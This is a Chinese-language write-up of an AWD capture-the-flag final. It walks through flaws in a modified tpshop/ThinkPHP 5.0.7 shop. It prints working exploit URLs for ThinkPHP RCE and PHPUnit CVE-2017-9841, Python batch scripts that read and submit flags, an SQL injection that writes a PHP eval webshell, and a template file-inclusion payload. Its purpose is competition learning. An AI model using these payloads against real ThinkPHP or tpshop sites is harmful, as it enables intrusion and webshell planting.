introduction
有幸参与了祥云杯决赛,由于这次的AWD题目相对比较有意思,特此记录,线下AWD共放出2道Web环境,但由于其中一道不可抗拒的因素,在开始后不久就被主办方下线,所以此文只分析另一道被打了一天的web环境。两道题环境都会提供在文章最下方
第一个洞
首先用自己的AWD框架把源码下到本地,扔到D盾
复现vulhub的小伙伴肯定都知道这个CVE-2017-9841,https://vulhub.org/#/environments/phpunit/CVE-2017-9841/
<?php eval('?>' . file_get_contents('php://input'));
我们可以直接post exp过去即可,这里也是发现得早批量写的快成功拿到比赛一血
第二个洞
此CMS为tpshop,但和网上公开的tpshop源码不太相同,既然是tp,肯定是要看看tp rce的漏洞的
全局搜索version 发现版本为5.0.7,疑似存在tp5 rce
用网上公开的exp
/index.php/?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=cat+/flag
并不能直接打成功,
因为并不存在index模块,我们就无法逃逸正则调用任意方法,我们需要找到一个默认存在的模块
(这里因为对tp5 rce原理不熟卡了好久)
其实首页随便点几个链接或者看源码就可以发现,此cms存在Home Admin等模块
第三四五个洞
由于cms为mvc,接下来从控制器下手,在home模块的控制器下面找到一个Test.php
<?php namespace app\home\controller; use think\Controller; use think\Url; use think\Config; use think\Page; use think\Verify; use think\Db; use think\Cache; class Test extends Controller { public function index(){ $mid = 'hello'.date('H:i:s'); //echo "测试分布式数据库$mid"; //echo "<br/>"; //echo $_GET['aaa']; M('config')->master()->where("id",1)->value('value'); //echo M('config')->where("id",1)->value('value'); //echo M('config')->where("id",1)->value('name'); /* //DB::name('member')->insert(['mid'=>$mid,'name'=>'hello5']); $member = DB::name('member')->master()->where('mid',$mid)->select(); echo "<br/>"; print_r($member); $member = DB::name('member')->where('mid',$mid)->select(); echo "<br/>"; print_r($member); */ // echo "<br/>"; // echo DB::name('member')->master()->where('mid','111')->value('name'); // echo "<br/>"; // echo DB::name('member')->where('mid','111')->value('name'); echo C('cache.type'); } public function redis(){ Cache::clear(); $cache = ['type'=>'redis','host'=>'192.168.0.201']; Cache::set('cache',$cache); $cache = Cache::get('cache'); print_r($cache); S('aaa','ccccccccccccccccccccccc'); echo S('aaa'); } public function dlfile($file_url, $save_to) { $ch = curl_init(); // 启动一个CURL会话 curl_setopt($ch, CURLOPT_POST, 0); curl_setopt($ch,CURLOPT_URL,$file_url); // 要访问的地址 curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); $file_content = curl_exec($ch); // 执行操作 curl_close($ch); // 关键CURL会话 $downloaded_file = fopen($save_to, 'w'); fwrite($downloaded_file, $file_content); fclose($downloaded_file); } public function mysql_test($dbname, $dbuser, $dbpass, $dbserver, $dbport, $dbquery) { $m = mysqli_init(); $conn = mysqli_real_connect($m, $dbserver, $dbuser, $dbpass, $dbname, intval($dbport)); $result = mysqli_query($m, $dbquery) or die(mysqli_error($conn)); $data = mysqli_fetch_all($result, MYSQLI_ASSOC); var_dump($data); mysqli_close($m); } public function object_test($input) { $a = unserialize($input); } public function table(){ $t = Db::query("show tables like '%tp_goods_2017%'"); print_r($t); } }
这短短的一个文件中藏了3个洞,分别是ssrf导致任意文件读写,mysql远程连接文件读取或者本地任意sql执行,反序列化,太简单了看看exp就行
@round("http://172.20.5.1-30:6022") def attack7(url): try: a = hh.http(url+"/index.php/home/test/dlfile?file_url=file:///flag&save_to=/public/js/jquery-1.10.3.min.js") a = hh.http(url+"/public/js/jquery-1.10.3.min.js") flag = a[2].strip() print "|"+flag+"|" submit_flag(flag) except Exception as e: print e pass
@round("http://172.20.5.1-30:6022") def attack11(url): try: a = hh.http(url+r"/index.php?m=Home&c=test&a=mysql_test&database=ctf&dbname=ctf&dbuser=user&dbpass=123456&dbserver=localhost&dbport=3306&dbquery=select+load_file('\/flag');") flag = a[2].strip() flag = re.search(r"flag{.*?}",flag,re.S).group() print flag submit_flag(flag) print url except Exception as e: print e pass
mysql的洞一开始想法是远连读文件,但是发现服务器和选手pc好像不通,于是作罢,后面发现可以连本地直接load_file。。。
反序列化洞由于比赛时候断网找不到exp,也没写,并且由于三个洞在同一个文件,修复的话会直接整个文件删除,所以就没太在意了
第六个洞
<?php public function return_goods_list() { $where = " user_id=$this->user_id "; // 搜索订单 根据商品名称 或者 订单编号 $search_key = trim(I('search_key')); if($search_key) { $where .= " and order_sn=$search_key"; } $count = M('return_goods')->where($where)->count(); $page = new Page($count,10); $list = M('return_goods')->where($where)->order("id desc")->limit("{$page->firstRow},{$page->listRows}")->select(); $goods_id_arr = get_arr_column($list, 'goods_id'); if(!empty($goods_id_arr)) $goodsList = M('goods')->where("goods_id","in", implode(',',$goods_id_arr))->getField('goods_id,goods_name'); $state = C('REFUND_STATUS'); $this->assign('state',$state); $this->assign('goodsList', $goodsList); $this->assign('list', $list); $this->assign('page', $page->show());// 赋值分页输出 return $this->fetch(); }
很明显的看出来上面第九行将url参数search_key与sql语句进行了拼接,而且环境是debug,一开始想用报错注入
但无论怎么构造都报错1105 Only constant XPATH queries are supported
由于时间问题,发现服务器环境可以写文件,就没继续考虑读flag,而是写马利用
?search_key=1)union select '<?php eval($_REQUEST[1])?>' into dumpfile "/var/www/html/runtime/.2.php";%23
第七个洞
fetch函数文件包含
最后一个洞是倒数第二轮抓流量抓到的,并没有挖到
exp类似这样(本地复现方便,当时exp并不是这样)
http://127.0.0.1/index.php/Home/Cart/header_cart_list?template=../../../runtime/temp/ma
浏览runtime/temp/ma.html
<!DOCTYPE html> <html lang="en"> <head> <meta charset="UTF-8"> <title>Title</title> </head> <body> <?php phpinfo()?> </body> </html>
通过exp的url找到对应method
<?php public function header_cart_list() { $cartLogic = new CartLogic(); $cartLogic->setUserId($this->user_id); $cart_result = $cartLogic->getUserCartList(0); if(empty($cart_result['total_price'])) $cart_result['total_price'] = Array( 'total_fee' =>0, 'cut_fee' =>0, 'num' => 0); $this->assign('cartList', $cart_result['cartList']); // 购物车的商品 $this->assign('cart_total_price', $cart_result['total_price']); // 总计 $template = I('template','header_cart_list'); return $this->fetch($template); }
u1s1我是第一次见tp fetch函数可控导致的文件包含,我只见过assgin可控导致的文件包含
ThinkPHP5漏洞分析之文件包含
在赛后复现的时候,发现fetch参数不仅可以目录穿越,也可以用绝对路径或者相对路径,通过../穿越选择我们想要的模板文件名,
下面是官方对fetch函数的解释
有点啰嗦,直接看源码吧。。
<?php public function fetch($template, $data = [], $config = []) { if ('' == pathinfo($template, PATHINFO_EXTENSION)) { // 获取模板文件名 $template = $this->parseTemplate($template); } // 模板不存在 抛出异常 if (!is_file($template)) { // if(strstr($template,'pre_sell_list')){ // header("Content-type: text/html; charset=utf-8"); // exit('要使用预售功能请联系TPshop官网客服,官网地址 www.tp-shop.cn'); // } throw new TemplateNotFoundException('template not exists:' . $template, $template); } // 记录视图信息 App::$debug && Log::record('[ VIEW ] ' . $template . ' [ ' . var_export(array_keys($data), true) . ' ]', 'info'); $this->template->fetch($template, $data, $config); }
通过调试发现,上面代码4-7行,如果输入的参数无后缀,则
<?php $template = MODULE_PATH.$template.".html"
也就是系统会在fetch参数前加上模板的绝对目录,参数后加上.html
如果有后缀,那么就会直接扔进is_file去判断,判断通过后,进入21行语句进行文件包含
我们可以通过上传一句话图片马或者其他文件至服务端,然后通过fetch造成文件包含
http://127.0.0.1/index.php/Home/Cart/header_cart_list?template=runtime\temp\1.jpg
当然这里绝路目录相对目录穿越目录及任意后缀都是可以的
summary
其实比赛漏洞并不难,AWD主要还是选手的反应速度和脚本编写能力,我大部分时候都在上别人车,抓到新洞流量立马写批量反打,发现被中马看看其他环境有没有一样的马上车。以及被种不死马,蠕虫马,递归马等恶心的东西时候写脚本去删马,都耗费了大量的时间,真正留给挖洞的时间并不多。
当然本文章并没有把所有的洞都写完,有很多漏洞赛时并没有挖出,据说还有几个SQL注入,但当时我已经挖了一个就没继续看了,
而且看网上有很多tpshop后台的getshell。。当时比赛连后台都没进(好多人改密码)而且断网连exp都搜不到。。所以就没看了。。有感兴趣的师傅网上搜搜有很多exp和分析。
源码有点大上传不了,就扔baidu云了。
链接:https://pan.baidu.com/s/1r35k7FSfE5M-erz-_quPjw
提取码:kc2f
如有侵权请联系:admin#unsafe.sh